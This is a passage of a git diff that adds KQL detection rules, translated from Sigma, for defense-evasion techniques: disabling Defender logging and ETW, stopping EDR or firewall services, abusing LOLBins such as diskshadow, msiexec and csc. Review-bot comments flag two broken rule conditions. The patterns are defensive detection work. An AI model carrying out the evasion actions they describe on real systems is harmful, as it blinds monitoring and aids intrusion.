@@ -0,0 +1,12 @@ +// Title: Disabled Windows Defender Eventlog +// Author: Florian Roth (Nextron Systems) +// Date: 2022-07-04 +// Level: high +// Description: Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Other Antivirus software installations could cause Windows to disable that eventlog (unknown) + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Windows Defender/Operational\\Enabled" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disabling_security_tools.kql b/KQL/rules/Defense Evasion/disabling_security_tools.kql new file mode 100644 index 00000000..9b31ea17 --- /dev/null +++ b/KQL/rules/Defense Evasion/disabling_security_tools.kql 
@@ -0,0 +1,12 @@ +// Title: Disabling Security Tools +// Author: Ömer Günal, Alejandro Ortuno, oscd.community +// Date: 2020-06-17 +// Level: medium +// Description: Detects disabling security tools +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where ((ProcessCommandLine contains "cbdaemon" and ProcessCommandLine contains "stop") and FolderPath endswith "/service") or ((ProcessCommandLine contains "cbdaemon" and ProcessCommandLine contains "off") and FolderPath endswith "/chkconfig") or ((ProcessCommandLine contains "cbdaemon" and ProcessCommandLine contains "stop") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "cbdaemon" and ProcessCommandLine contains "disable") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "stop" and ProcessCommandLine contains "falcon-sensor") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "disable" and ProcessCommandLine contains "falcon-sensor") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "firewalld" and ProcessCommandLine contains "stop") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "firewalld" and ProcessCommandLine contains "disable") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "iptables" and ProcessCommandLine contains "stop") and FolderPath endswith "/service") or ((ProcessCommandLine contains "ip6tables" and ProcessCommandLine contains "stop") and FolderPath endswith "/service") or ((ProcessCommandLine contains "iptables" and ProcessCommandLine contains "stop") and FolderPath endswith "/chkconfig") or ((ProcessCommandLine contains "ip6tables" and ProcessCommandLine contains "stop") and FolderPath endswith "/chkconfig") or (ProcessCommandLine contains "0" and FolderPath endswith "/setenforce") \ No newline at end of file 
diff --git a/KQL/rules/Defense Evasion/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql b/KQL/rules/Defense Evasion/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql new file mode 100644 index 00000000..14f19685 --- /dev/null +++ b/KQL/rules/Defense Evasion/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql @@ -0,0 +1,15 @@ +// Title: Disabling Windows Defender WMI Autologger Session via Reg.exe +// Author: Matt Anderson (Huntress) +// Date: 2025-07-09 +// Level: high +// Description: Detects the use of reg.exe to disable the Event Tracing for Windows (ETW) Autologger session for Windows Defender API and Audit events. +By setting the 'Start' value to '0' for the 'DefenderApiLogger' or 'DefenderAuditLogger' session, an attacker can prevent these critical security events +from being logged, effectively blinding monitoring tools that rely on this data. This is a powerful defense evasion technique. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Highly unlikely + +DeviceProcessEvents +| where ((FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "add" and ProcessCommandLine contains "0") and (ProcessCommandLine contains "\\Control\\WMI\\Autologger\\DefenderApiLogger\\Start" or ProcessCommandLine contains "\\Control\\WMI\\Autologger\\DefenderAuditLogger\\Start")) and (not(ProcessCommandLine contains "0x00000001")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/diskshadow_script_mode_execution_from_potential_suspicious_location.kql b/KQL/rules/Defense Evasion/diskshadow_script_mode_execution_from_potential_suspicious_location.kql new file mode 100644 index 00000000..e2dab757 --- /dev/null +++ b/KQL/rules/Defense Evasion/diskshadow_script_mode_execution_from_potential_suspicious_location.kql 
@@ -0,0 +1,12 @@
+// Title: Diskshadow Script Mode - Execution From Potential Suspicious Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-15
+// Level: medium
+// Description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag where the script is located in a potentially suspicious location.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - False positives may occur if you execute the script from one of the paths mentioned in the rule. Apply additional filters that fits your org needs.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s " or ProcessCommandLine contains "–s " or ProcessCommandLine contains "—s " or ProcessCommandLine contains "―s ") and (ProcessVersionInfoOriginalFileName =~ "diskshadow.exe" or FolderPath endswith "\\diskshadow.exe") and (ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\ProgramData\\" or ProcessCommandLine contains "\\Users\\Public\\")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/diskshadow_script_mode_uncommon_script_extension_execution.kql b/KQL/rules/Defense Evasion/diskshadow_script_mode_uncommon_script_extension_execution.kql
new file mode 100644
index 00000000..3348ebad
--- /dev/null
+++ b/KQL/rules/Defense Evasion/diskshadow_script_mode_uncommon_script_extension_execution.kql
@@ -0,0 +1,14 @@
+// Title: Diskshadow Script Mode - Uncommon Script Extension Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-15
+// Level: medium
+// Description: Detects execution of "Diskshadow.exe" in script mode to execute an script with a potentially uncommon extension.
+Initial baselining of the allowed extension list is required.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - False postitve might occur with legitimate or uncommon extensions used internally. Initial baseline is required.
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s " or ProcessCommandLine contains "–s " or ProcessCommandLine contains "—s " or ProcessCommandLine contains "―s ") and (ProcessVersionInfoOriginalFileName =~ "diskshadow.exe" or FolderPath endswith "\\diskshadow.exe")) and (not(ProcessCommandLine contains ".txt"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/dism_remove_online_package.kql b/KQL/rules/Defense Evasion/dism_remove_online_package.kql
new file mode 100644
index 00000000..e8b6f687
--- /dev/null
+++ b/KQL/rules/Defense Evasion/dism_remove_online_package.kql
@@ -0,0 +1,12 @@
+// Title: Dism Remove Online Package
+// Author: frack113
+// Date: 2022-01-16
+// Level: medium
+// Description: Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Legitimate script
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "/Online" and ProcessCommandLine contains "/Disable-Feature") and FolderPath endswith "\\Dism.exe") or (FolderPath endswith "\\DismHost.exe" and (InitiatingProcessCommandLine contains "/Online" and InitiatingProcessCommandLine contains "/Disable-Feature"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/displaying_hidden_files_feature_disabled.kql b/KQL/rules/Defense Evasion/displaying_hidden_files_feature_disabled.kql
new file mode 100644
index 00000000..dad91c95
--- /dev/null
+++ b/KQL/rules/Defense Evasion/displaying_hidden_files_feature_disabled.kql
@@ -0,0 +1,12 @@
+// Title: Displaying Hidden Files Feature Disabled
+// Author: frack113
+// Date: 2022-04-02
+// Level: medium
+// Description: Detects modifications to the "Hidden" and "ShowSuperHidden" explorer registry values in order to disable showing of hidden files and system files.
+This technique is abused by several malware families to hide their files from normal users.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.001
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden" or RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/dll_execution_via_rasautou_exe.kql b/KQL/rules/Defense Evasion/dll_execution_via_rasautou_exe.kql
new file mode 100644
index 00000000..0b96f7e1
--- /dev/null
+++ b/KQL/rules/Defense Evasion/dll_execution_via_rasautou_exe.kql
@@ -0,0 +1,12 @@
+// Title: DLL Execution via Rasautou.exe
+// Author: Julia Fomina, oscd.community
+// Date: 2020-10-09
+// Level: medium
+// Description: Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -d " and ProcessCommandLine contains " -p ") and (FolderPath endswith "\\rasautou.exe" or ProcessVersionInfoOriginalFileName =~ "rasdlui.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/dll_load_by_system_process_from_suspicious_locations.kql b/KQL/rules/Defense Evasion/dll_load_by_system_process_from_suspicious_locations.kql
new file mode 100644
index 00000000..b19e2c39
--- /dev/null
+++ b/KQL/rules/Defense Evasion/dll_load_by_system_process_from_suspicious_locations.kql
@@ -0,0 +1,10 @@
+// Title: DLL Load By System Process From Suspicious Locations
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-17
+// Level: medium
+// Description: Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070
+
+DeviceImageLoadEvents
+| where (FolderPath startswith "C:\\Users\\Public\\" or FolderPath startswith "C:\\PerfLogs\\") and InitiatingProcessFolderPath startswith "C:\\Windows\\"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/dll_loaded_from_suspicious_location_via_cmspt_exe.kql b/KQL/rules/Defense Evasion/dll_loaded_from_suspicious_location_via_cmspt_exe.kql
new file mode 100644
index 00000000..281b5027
--- /dev/null
+++ b/KQL/rules/Defense Evasion/dll_loaded_from_suspicious_location_via_cmspt_exe.kql
@@ -0,0 +1,12 @@
+// Title: DLL Loaded From Suspicious Location Via Cmspt.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-30
+// Level: high
+// Description: Detects cmstp loading "dll" or "ocx" files from suspicious locations
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.003
+// False Positives:
+// - Unikely
+
+DeviceImageLoadEvents
+| where (FolderPath contains "\\PerfLogs\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Users\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "C:\\Temp\\") and (FolderPath endswith ".dll" or FolderPath endswith ".ocx") and InitiatingProcessFolderPath endswith "\\cmstp.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/dll_loaded_via_certoc_exe.kql b/KQL/rules/Defense Evasion/dll_loaded_via_certoc_exe.kql
new file mode 100644
index 00000000..ec54306b
--- /dev/null
+++ b/KQL/rules/Defense Evasion/dll_loaded_via_certoc_exe.kql
@@ -0,0 +1,10 @@
+// Title: DLL Loaded via CertOC.EXE
+// Author: Austin Songer @austinsonger
+// Date: 2021-10-23
+// Level: medium
+// Description: Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -LoadDLL " or ProcessCommandLine contains " /LoadDLL " or ProcessCommandLine contains " –LoadDLL " or ProcessCommandLine contains " —LoadDLL " or ProcessCommandLine contains " ―LoadDLL ") and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/dll_sideloading_of_shellchromeapi_dll.kql b/KQL/rules/Defense Evasion/dll_sideloading_of_shellchromeapi_dll.kql
new file mode 100644
index 00000000..37dd097e
--- /dev/null
+++ b/KQL/rules/Defense Evasion/dll_sideloading_of_shellchromeapi_dll.kql
@@ -0,0 +1,12 @@
+// Title: DLL Sideloading Of ShellChromeAPI.DLL
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-01
+// Level: high
+// Description: Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL.
+Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\ShellChromeAPI.dll"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/dllunregisterserver_function_call_via_msiexec_exe.kql b/KQL/rules/Defense Evasion/dllunregisterserver_function_call_via_msiexec_exe.kql
new file mode 100644
index 00000000..7873c4fd
--- /dev/null
+++ b/KQL/rules/Defense Evasion/dllunregisterserver_function_call_via_msiexec_exe.kql
@@ -0,0 +1,10 @@
+// Title: DllUnregisterServer Function Call Via Msiexec.EXE
+// Author: frack113
+// Date: 2022-04-24
+// Level: medium
+// Description: Detects MsiExec loading a DLL and calling its DllUnregisterServer function
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.007
+
+DeviceProcessEvents
+| where ProcessCommandLine contains ".dll" and (ProcessCommandLine contains " -z " or ProcessCommandLine contains " /z " or ProcessCommandLine contains " –z " or ProcessCommandLine contains " —z " or ProcessCommandLine contains " ―z ") and (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "\\msiexec.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/dotnet_clr_dll_loaded_by_scripting_applications.kql b/KQL/rules/Defense Evasion/dotnet_clr_dll_loaded_by_scripting_applications.kql
new file mode 100644
index 00000000..9a12ae14
--- /dev/null
+++ b/KQL/rules/Defense Evasion/dotnet_clr_dll_loaded_by_scripting_applications.kql
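Review bot: `ProcessVersionInfoOriginalFileName =~ "\\msiexec.exe"` compares the version-resource file name against a value with a leading backslash, so that alternative can never match; the sibling rules in this commit compare the same column against the bare name (`=~ "reg.exe"`, `=~ "diskshadow.exe"`, `=~ "CertOC.exe"`). It should read `ProcessVersionInfoOriginalFileName =~ "msiexec.exe"`. As written the rule only fires on `FolderPath endswith "\\msiexec.exe"`, so a renamed copy of msiexec is missed, which is the case the OriginalFileName check exists to cover.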
@@ -0,0 +1,10 @@
+// Title: DotNet CLR DLL Loaded By Scripting Applications
+// Author: omkar72, oscd.community
+// Date: 2020-10-14
+// Level: high
+// Description: Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.privilege-escalation, attack.t1055
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\clr.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath endswith "\\mscorlib.dll") and (InitiatingProcessFolderPath endswith "\\cmstp.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\msxsl.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/driver_added_to_disallowed_images_in_hvci_registry.kql b/KQL/rules/Defense Evasion/driver_added_to_disallowed_images_in_hvci_registry.kql
new file mode 100644
index 00000000..a4f28717
--- /dev/null
+++ b/KQL/rules/Defense Evasion/driver_added_to_disallowed_images_in_hvci_registry.kql
@@ -0,0 +1,13 @@
+// Title: Driver Added To Disallowed Images In HVCI - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems), Omar Khaled (@beacon_exe)
+// Date: 2023-12-05
+// Level: high
+// Description: Detects changes to the "HVCIDisallowedImages" registry value to potentially add a driver to the list, in order to prevent it from loading.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Legitimate usage of this key would also trigger this. Investigate the driver being added and make sure its intended
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Control\\CI*" and RegistryKey contains "\\HVCIDisallowedImages"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/driver_dll_installation_via_odbcconf_exe.kql b/KQL/rules/Defense Evasion/driver_dll_installation_via_odbcconf_exe.kql
new file mode 100644
index 00000000..5bbc8d51
--- /dev/null
+++ b/KQL/rules/Defense Evasion/driver_dll_installation_via_odbcconf_exe.kql
@@ -0,0 +1,12 @@
+// Title: Driver/DLL Installation Via Odbcconf.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-22
+// Level: medium
+// Description: Detects execution of "odbcconf" with "INSTALLDRIVER" which installs a new ODBC driver. Attackers abuse this to install and run malicious DLLs.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.008
+// False Positives:
+// - Legitimate driver DLLs being registered via "odbcconf" will generate false positives. Investigate the path of the DLL and its contents to determine if the action is authorized.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "INSTALLDRIVER " and ProcessCommandLine contains ".dll") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")
\ No newline at end of file
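Review bot: `RegistryKey endswith "\\Control\\CI*"` treats the `*` as a literal character in KQL, so the key test never matches a real path under `\Control\CI\` and the HVCI rule is silently dead; the asterisk looks like a Sigma wildcard that the conversion did not translate. A test that can match and keeps the intent is `| where RegistryKey contains "\\Control\\CI\\" and RegistryKey contains "\\HVCIDisallowedImages"`. Worth adding a converter check that rejects `*` inside an `endswith`/`startswith`/`=~` literal, since other wildcard-bearing Sigma fields would fail the same way.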
diff --git a/KQL/rules/Defense Evasion/drop_binaries_into_spool_drivers_color_folder.kql b/KQL/rules/Defense Evasion/drop_binaries_into_spool_drivers_color_folder.kql
new file mode 100644
index 00000000..3e8320ef
--- /dev/null
+++ b/KQL/rules/Defense Evasion/drop_binaries_into_spool_drivers_color_folder.kql
@@ -0,0 +1,10 @@
+// Title: Drop Binaries Into Spool Drivers Color Folder
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-28
+// Level: medium
+// Description: Detects the creation of suspcious binary files inside the "\windows\system32\spool\drivers\color\" as seen in the blog referenced below
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceFileEvents
+| where (FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".sys") and FolderPath startswith "C:\\Windows\\System32\\spool\\drivers\\color\\"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/dumpminitool_execution.kql b/KQL/rules/Defense Evasion/dumpminitool_execution.kql
new file mode 100644
index 00000000..eddb3d35
--- /dev/null
+++ b/KQL/rules/Defense Evasion/dumpminitool_execution.kql
@@ -0,0 +1,10 @@
+// Title: DumpMinitool Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
+// Date: 2022-04-06
+// Level: medium
+// Description: Detects the use of "DumpMinitool.exe" a tool that allows the dump of process memory via the use of the "MiniDumpWriteDump"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " Full" or ProcessCommandLine contains " Mini" or ProcessCommandLine contains " WithHeap") and ((FolderPath endswith "\\DumpMinitool.exe" or FolderPath endswith "\\DumpMinitool.x86.exe" or FolderPath endswith "\\DumpMinitool.arm64.exe") or (ProcessVersionInfoOriginalFileName in~ ("DumpMinitool.exe", "DumpMinitool.x86.exe", "DumpMinitool.arm64.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/dumpstack_log_defender_evasion.kql b/KQL/rules/Defense Evasion/dumpstack_log_defender_evasion.kql
new file mode 100644
index 00000000..56ddc704
--- /dev/null
+++ b/KQL/rules/Defense Evasion/dumpstack_log_defender_evasion.kql
@@ -0,0 +1,10 @@
+// Title: DumpStack.log Defender Evasion
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-06
+// Level: critical
+// Description: Detects the use of the filename DumpStack.log to evade Microsoft Defender
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where FolderPath endswith "\\DumpStack.log" or ProcessCommandLine contains " -o DumpStack.log"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/dynamic_csharp_compile_artefact.kql b/KQL/rules/Defense Evasion/dynamic_csharp_compile_artefact.kql
new file mode 100644
index 00000000..0a1af196
--- /dev/null
+++ b/KQL/rules/Defense Evasion/dynamic_csharp_compile_artefact.kql
@@ -0,0 +1,13 @@
+// Title: Dynamic CSharp Compile Artefact
+// Author: frack113
+// Date: 2022-01-09
+// Level: low
+// Description: When C# is compiled dynamically, a .cmdline file will be created as a part of the process.
+Certain processes are not typically observed compiling C# code, but can do so without touching disk.
+This can be used to unpack a payload for execution
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.004
+
+DeviceFileEvents
+| where FolderPath endswith ".cmdline"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/dynamic_net_compilation_via_csc_exe.kql b/KQL/rules/Defense Evasion/dynamic_net_compilation_via_csc_exe.kql
new file mode 100644
index 00000000..9ab0a135
--- /dev/null
+++ b/KQL/rules/Defense Evasion/dynamic_net_compilation_via_csc_exe.kql
@@ -0,0 +1,14 @@
+// Title: Dynamic .NET Compilation Via Csc.EXE
+// Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2019-08-24
+// Level: medium
+// Description: Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.004
+// False Positives:
+// - Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897
+// - Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962
+// - Ansible
+
+DeviceProcessEvents
+| where FolderPath endswith "\\csc.exe" and ((ProcessCommandLine contains ":\\Perflogs\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "\\Windows\\Temp\\") or ((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Pictures\\")) or ProcessCommandLine matches regex "([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\\\[Aa]pp[Dd]ata\\\\([Ll]ocal([Ll]ow)?|[Rr]oaming))\\\\[^\\\\]{1,256}$") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\inetsrv\\w3wp.exe"))) and (not(((InitiatingProcessCommandLine contains 
"JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw" or InitiatingProcessCommandLine contains "cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA" or InitiatingProcessCommandLine contains "nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA") or (InitiatingProcessFolderPath in~ ("C:\\ProgramData\\chocolatey\\choco.exe", "C:\\ProgramData\\chocolatey\\tools\\shimgen.exe")) or InitiatingProcessCommandLine contains "\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/enable_local_manifest_installation_with_winget.kql b/KQL/rules/Defense Evasion/enable_local_manifest_installation_with_winget.kql
new file mode 100644
index 00000000..75b3547f
--- /dev/null
+++ b/KQL/rules/Defense Evasion/enable_local_manifest_installation_with_winget.kql
@@ -0,0 +1,12 @@
+// Title: Enable Local Manifest Installation With Winget
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-17
+// Level: medium
+// Description: Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence
+// False Positives:
+// - Administrators or developers might enable this for testing purposes or to install custom private packages
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\AppInstaller\\EnableLocalManifestFiles"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/enable_remote_connection_between_anonymous_computer_allowanonymouscallback.kql b/KQL/rules/Defense Evasion/enable_remote_connection_between_anonymous_computer_allowanonymouscallback.kql
new file mode 100644
index 00000000..78ab8562
--- /dev/null
+++ b/KQL/rules/Defense Evasion/enable_remote_connection_between_anonymous_computer_allowanonymouscallback.kql
@@ -0,0 +1,12 @@
+// Title: Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-11-03
+// Level: medium
+// Description: Detects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Administrative activity
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Microsoft\\WBEM\\CIMOM\\AllowAnonymousCallback"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/esxi_syslog_configuration_change_via_esxcli.kql b/KQL/rules/Defense Evasion/esxi_syslog_configuration_change_via_esxcli.kql
new file mode 100644
index 00000000..4edd6106
--- /dev/null
+++ b/KQL/rules/Defense Evasion/esxi_syslog_configuration_change_via_esxcli.kql
@@ -0,0 +1,12 @@
+// Title: ESXi Syslog Configuration Change Via ESXCLI
+// Author: Cedric Maurugeon
+// Date: 2023-09-04
+// Level: medium
+// Description: Detects changes to the ESXi syslog configuration via "esxcli"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1562.001, attack.t1562.003, attack.t1059.012
+// False Positives:
+// - Legitimate administrative activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " set" and (ProcessCommandLine contains "system" and ProcessCommandLine contains "syslog" and ProcessCommandLine contains "config") and FolderPath endswith "/esxcli"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/etw_logging_tamper_in_net_processes_via_commandline.kql b/KQL/rules/Defense Evasion/etw_logging_tamper_in_net_processes_via_commandline.kql
new file mode 100644
index 00000000..e81ed4dd
--- /dev/null
+++ b/KQL/rules/Defense Evasion/etw_logging_tamper_in_net_processes_via_commandline.kql
@@ -0,0 +1,14 @@
+// Title: ETW Logging Tamper In .NET Processes Via CommandLine
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: high
+// Description: Detects changes to environment variables related to ETW logging via the CommandLine.
+This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "COMPlus_ETWEnabled" or ProcessCommandLine contains "COMPlus_ETWFlags"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/etw_trace_evasion_activity.kql b/KQL/rules/Defense Evasion/etw_trace_evasion_activity.kql
new file mode 100644
index 00000000..b3cdd5fc
--- /dev/null
+++ b/KQL/rules/Defense Evasion/etw_trace_evasion_activity.kql
@@ -0,0 +1,11 @@
+// Title: ETW Trace Evasion Activity
+// Author: @neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
+// Date: 2019-03-22
+// Level: high
+// Description: Detects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion.
+
+// MITRE Tactic: Defense Evasion
